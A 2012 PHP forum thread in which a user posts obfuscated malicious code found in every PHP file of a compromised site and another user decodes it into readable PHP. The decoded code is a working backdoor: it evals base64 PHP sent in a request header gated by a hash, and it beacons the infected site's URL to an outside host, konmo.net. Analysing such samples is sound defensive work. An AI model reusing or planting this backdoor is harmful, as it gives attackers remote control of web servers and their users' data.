Encrypted script

Discussion in 'PHP' started by dean999, 18 Dec 2012.

  1. dean999

    Hi everyone, I'd like to know what this is! I found it on an already hacked site!

    PHP:
    <?php                                                                                                                                                                 /*versio:2.11*/$Q000Q=0;$GLOBALS['IlII'] = '0fY3VybA62X2luaXQ%.1!3&YWxsb3dfdXJsX2ZvcGVu!55MQ64^X3NldG9wdA1#X2V4ZWMXwcY2xvc2U*.PGltZyBzcmM9Ig~IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4ddwa29ubW8ubmV0d8_a3RpcHAuY2g7%00&c2lsYmVyLmRlf$&~@WV8~e5Og*7~ZGlzcGxheV9lcnJvcnM__@5*ZGV0ZXJtaW5hdG9y*YW5k9(&Mi4xMQ#7SWtjMnhUdjVBeTB3M2Q%YmFzZTY0X2VuY29kZQ}YmFzZTY0X2RlY29kZQa#aHR0cDovLwSFRUUF9IT1NU}0fSFRUUF9VU0VSX0FHRU5Ua;~dW5pb242a{c2VsZWN0@;UkVRVUVTVF9VUkka83U0NSSVBUX05BTUUe}5$UVVFUllfU1RSSU5HPw44L3RtcC8L3RtcAVE1QVEVNUAVE1QRElS2%dXBsb2FkX3RtcF9kaXI,Lg$6dmVyc2lv};.5LQ0}LXBocA#fSFRUUF9FWEVDUEhQ*#)b3V0b2sc^,d^*aHR0cA08Oi8v*&%L3BnLnBocD91PQe;Jms9{JnQ9cGhwJnA9_~JnY9f^^6261736536345f6465636f6465';$Q000Q=pack('H*',substr($GLOBALS['IlII'], -26));if (!function_exists('QQ0QQQOO')){function QQ0QQQOO($QQ$II){$c=$GLOBALS['IlII']; $d=pack('H*',substr($GLOBALS['IlII'], -26)); return 
$d(substr($c$QQ$II));}};eval($Q000Q('aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJFEwT1EwMCl7ICRJMWxJMWwgPSBRUTBRUVFPTygyLCA2KTsgJElsbGxsbCA9ICRJMWxJMWwuUVEwUVFRT08oMTAsIDcpOyBpZiAoQGluaV9nZXQoUVEwUVFRT08oMjMsIDIwKSkgPT0gUVEwUVFRT08oNDYsIDIpKSB7ICRJSTFJbDE9QGZpbGVfZ2V0X2NvbnRlbnRzKCRRME9RMDApOyByZXR1cm4gUVEwUVFRT08oNTAsIDApOyB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCRJbGxsbGwpKXsgJFFPUTBRTyA9IEAkSWxsbGxsKCk7ICRRME9PT1EgPSAkSTFsSTFsLlFRMFFRUU9PKDUxLCAxMCk7ICRJbDFsbGwgPSAkSTFsSTFsLlFRMFFRUU9PKDYzLCA3KTsgJFFRUVFPUSA9ICRJMWxJMWwuUVEwUVFRT08oNzAsIDIpLlFRMFFRUU9PKDczLCA3KTsgQCRRME9PT1EoJFFPUTBRTywgQ1VSTE9QVF9VUkwsICRRME9RMDApOyBAJFEwT09PUSgkUU9RMFFPLCBDVVJMT1BUX0hFQURFUixmYWxzZSk7IEAkUTBPT09RKCRRT1EwUU8sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7IEAkUTBPT09RKCRRT1EwUU8sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsNSk7IGlmICgkUVFPMFFRID0gQCRJbDFsbGwoJFFPUTBRTykpIHtyZXR1cm4gUVEwUVFRT08oNTAsIDApO30gQCRRUVFRT1EoJFFPUTBRTyk7IHJldHVybiBRUTBRUVFPTyg1MCwgMCk7IH0gZWxzZSB7IHJldHVybiBRUTBRUVFPTyg4MiwgMTQpLiRRME9RMDAuUVEwUVFRT08oOTcsIDM5KTsgfSB9IGZ1bmN0aW9uIHVwZCgkUTAwT1EwLCRRME9RMDApeyAkSTExSWxsPUBmb3BlbigkUTAwT1EwLFFRMFFRUU9PKDEzNywgMikpOyBAZmNsb3NlKCRJMTFJbGwpOyBpZiAoQGlzX2ZpbGUoJFEwME9RMCkpe3dyaXRlKCRRMDBPUTAsZ2V0ZmlsZSgkUTBPUTAwKSk7fTsgfSBmdW5jdGlvbiB3cml0ZSgkUTAwT1EwLCRRUTAwME8peyBpZiAoJFFPUU9RTz1AZm9wZW4oJFEwME9RMCxRUTBRUVFPTygxMzcsIDIpKSl7IEBmd3JpdGUoJFFPUU9RTywkUVEwMDBPKTsgQGZjbG9zZSgkUU9RT1FPKTsgfSB9ICRRUVFRTzAgPSBBcnJheShRUTBRUVFPTygxMzksIDEyKSwgUVEwUVFRT08oMTU0LCAxMSksIFFRMFFRUU9PKDE3MCwgMTIpKTsgZnVuY3Rpb24gb3V0cHV0KCRRT1FPME8sICRJSTFJSWwpeyBlY2hvIFFRMFFRUU9PKDE4NywgMykuJFFPUU8wTy5RUTBRUVFPTygxOTMsIDIpLiRJSTFJSWwuIlxyXG4iOyB9IGZ1bmN0aW9uIHBhcmFtKCl7IHJldHVybiBRUTBRUVFPTyg1MCwgMCk7IH0gQGluaV9zZXQoUVEwUVFRT08oMTk4LCAxOSksIDApOyBkZWZpbmUoUVEwUVFRT08oMjIyLCAxNiksIDEpOyAkUTBPT1FPPVFRMFFRUU9PKDIzOSwgNCk7ICRJbElsbGw9UVEwUVFRT08oMjQ2LCA2KTsgJFFPT09PUT1RUTBRUVFPTygyNTQsIDE5KTsgJElsbElJMT1RUTBRUVFPTygyNzQsIDE4KTsgJFFRUVEwTz1RUTBRUVFPTygyOTMsIDE4KTsgJElJMWxsST1RUTBRUVFPTygzMTMsIDEwKTs
gJElJMWxsSS49c3RydG9sb3dlcihAJF9TRVJWRVJbUVEwUVFRT08oMzIzLCAxMildKTsgJFFPUTBPTyA9IEAkX1NFUlZFUltRUTBRUVFPTygzMzgsIDIwKV07IGZvcmVhY2ggKCRfR0VUIGFzICRRT1FPME89PiRJSTFJSWwpeyBpZiAoc3RycG9zKCRJSTFJSWwsUVEwUVFRT08oMzYxLCA3KSkpeyRfR0VUWyRRT1FPME9dPVFRMFFRUU9PKDUwLCAwKTt9IGVsc2VpZiAoc3RycG9zKCRJSTFJSWwsUVEwUVFRT08oMzcxLCA4KSkpeyRfR0VUWyRRT1FPME9dPVFRMFFRUU9PKDUwLCAwKTt9IH0gaWYoIWlzc2V0KCRfU0VSVkVSW1FRMFFRUU9PKDM4MSwgMTUpXSkpIHsgJF9TRVJWRVJbUVEwUVFRT08oMzgxLCAxNSldID0gJF9TRVJWRVJbUVEwUVFRT08oMzk5LCAxNSldOyBpZigkX1NFUlZFUltRUTBRUVFPTyg0MTgsIDE2KV0pIHsgJF9TRVJWRVJbUVEwUVFRT08oMzgxLCAxNSldIC49IFFRMFFRUU9PKDQzNCwgMikgLiAkX1NFUlZFUltRUTBRUVFPTyg0MTgsIDE2KV07IH0gfSBpZiAoJFFPT1FPMD0kSUkxbGxJLkAkX1NFUlZFUltRUTBRUVFPTygzODEsIDE1KV0peyAkSUlsMWxJPUBtZDUoJElJMWxsSS4kSWxJbGxsLlBIUF9PUy4kUU9PT09RKTsgJFFRUTAwMD1RUTBRUVFPTyg0MzgsIDcpOyAkSTFJbGxJID0gQXJyYXkoUVEwUVFRT08oNDQ1LCA2KSwgQCRfU0VSVkVSW1FRMFFRUU9PKDQ1MSwgNCldLCBAJF9TRVJWRVJbUVEwUVFRT08oNDU1LCA2KV0sIEAkX0VOVltRUTBRUVFPTyg0NTEsIDQpXSwgQCRfRU5WW1FRMFFRUU9PKDQ2MSwgOCldLCBAJF9FTlZbUVEwUVFRT08oNDU1LCA2KV0sIEBpbmlfZ2V0KFFRMFFRUU9PKDQ3MSwgMTkpKSk7IGZvcmVhY2ggKCRJMUlsbEkgYXMgJEkxbDFsbCl7IGlmICghZW1wdHkoJEkxbDFsbCkpeyAkSTFsMWxsLj1ESVJFQ1RPUllfU0VQQVJBVE9SOyBpZiAoQGlzX3dyaXRhYmxlKCRJMWwxbGwpKXsgJFFRUTAwMCA9ICRJMWwxbGw7IGJyZWFrOyB9IH0gfSAkdG1wPSRRUVEwMDAuUVEwUVFRT08oNDkxLCAyKS4kSUlsMWxJOyBpZiAoQCRfU0VSVkVSWyJIVFRQX1lfQVVUSCJdPT0kSUlsMWxJKXsgZWNobyAiXHJcbiI7IEBvdXRwdXQoUVEwUVFRT08oNDk1LCA4KSwgJElsSWxsbC5RUTBRUVFPTyg1MDcsIDIpLiRRME9PUU8uUVEwUVFRT08oNTExLCA2KSk7IGlmICgkUVEwT09RPSRRUVFRME8oQCRfU0VSVkVSW1FRMFFRUU9PKDUxOSwgMTYpXSkpe0BldmFsKCRRUTBPT1EpO2VjaG8gIlxyXG4iO291dHB1dChRUTBRUVFPTyg1MzgsIDQpLCBRUTBRUVFPTyg1NDIsIDMpKTt9IGV4aXQoMCk7IH0gaWYgKEBpc19maWxlKCR0bXApKXtAaW5jbHVkZV9vbmNlKCR0bXApO30gZWxzZXsgJFFPT1FPMD1AdXJsZW5jb2RlKCRRT09RTzApOyB1cGQoJHRtcCxRUTBRUVFPTyg1NTEsIDYpLlFRMFFRUU9PKDU1OSwgNCkuJFFRUVFPMFswXS5RUTBRUVFPTyg1NjYsIDE0KS4kUU9PUU8wLlFRMFFRUU9PKDU4MiwgNCkuJElJbDFsSS5RUTBRUVFPTyg1ODcsIDEyKS4kUTBPT1FPLlFRMFFRUU9PKDYwMSwgNCkuJElsSWxsbCk7IH0
gfSB9'));?>
     
  2. qaz

    Damn, post it in a readable form.
     
  3. proroot

    Theoretically, without even looking at the code, you could say it's a shell :D
     
  4. dean999

    http://rghost.ru/42335834
    Here is one of the files; all the PHP files there contain this piece of code, and they all have the same creation date.
     
  5. LStr1ke

    PHP:
    if (!defined("determinator")) {
        // Fetch $url; both fetch branches discard the response and return ''.
        function getfile($url) {
            if (@ini_get('allow_url_fopen') == 1) {
                $result = @file_get_contents($url);
                return '';
            } elseif (function_exists('curl_init')) {
                $ch = @curl_init();
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_HEADER, false);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
                if ($result = curl_exec($ch)) {
                    return '';
                }
                curl_close($ch);
                return '';
            } else {
                return '<img src="'.$url.'" width="1px" height="1px" />';
            }
        }
        // Create the cache file, then fill it with whatever getfile() returns.
        function upd($tmp, $url) {
            $f = @fopen($tmp, 'w');
            @fclose($f);
            if (@is_file($tmp)) {
                write($tmp, getfile($url));
            };
        }
        function write($tmp, $data) {
            if ($f = @fopen($tmp, 'w')) {
                @fwrite($f, $data);
                @fclose($f);
            }
        }

        $hosts = Array('konmo.net', 'ktipp.ch', 'silber.de');

        function output($f, $a) {
            echo 'Y_'.$f.':'.$a."\r\n";
        }
        function param() {
            return '';
        }

        @ini_set('display_errors', 0);
        define('determinator', 1);
        $and = 'and';
        $version = '2.11';
        $key = 'Ikc2xTv5Ay0w3d';
        $self = 'http://';
        $self .= strtolower(@$_SERVER['HTTP_HOST']);
        $user_agent = @$_SERVER['HTTP_USER_AGENT'];
        // Blank any GET parameter that contains "union" or "select".
        // The loop key is named $name so that it does not overwrite $key above.
        foreach ($_GET as $name => $value) {
            if (strpos($value, 'union')) {
                $_GET[$name] = '';
            } elseif (strpos($value, 'select')) {
                $_GET[$name] = '';
            }
        }

        if (!isset($_SERVER['REQUEST_URI'])) {
            $_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME'];
            if ($_SERVER['QUERY_STRING']) {
                $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING'];
            }
        }

        if ($self_url = $self . @$_SERVER['REQUEST_URI']) {
            // Per-host token derived from host name, version, OS and the fixed key.
            $hash = @md5($self.$version.PHP_OS.$key);
            $tmp = '/tmp/';
            $tmp_array = Array(
                '/tmp',
                @$_SERVER['TMP'],
                @$_SERVER['TEMP'],
                @$_ENV['TMP'],
                @$_ENV['TMPDIR'],
                @$_ENV['TEMP'],
                @ini_get('upload_tmp_dir')
            );
            // Use the first writable temporary directory.
            foreach ($tmp_array as $tmp_str) {
                if (!empty($tmp_str)) {
                    $tmp_str .= DIRECTORY_SEPARATOR;
                    if (@is_writable($tmp_str)) {
                        $tmp = $tmp_str;
                        break;
                    }
                }
            }
            $tmp = $tmp.'.'.$hash;
            // Remote-execution path, gated on a request header matching $hash.
            if (@$_SERVER["HTTP_Y_AUTH"] == $hash) {
                echo "\r\n";
                @output('versio', $version.'-'.$and.'-php');
                if ($result = base64_decode(@$_SERVER['HTTP_EXECPHP'])) {
                    @eval($result);
                    echo "\r\n";
                    output('out', 'ok');
                }
                exit(0);
            }
            // Otherwise include the cached file if present, else create it.
            if (@is_file($tmp)) {
                @include_once($tmp);
            } else {
                $self_url = @urlencode($self_url);
                upd($tmp, 'http://konmo.net/pg.php?u='.$self_url.'&k='.$hash.'&t=php&p='.$and.'&v='.$version);
            }
        }
    }
     
    #5 LStr1ke, 21 Dec 2012
    Last edited: 21 Dec 2012
  6. Exompies

    LStr1ke, please decode this, if it's not too much trouble: http://rghost.ru/42550659
    Thank you very much!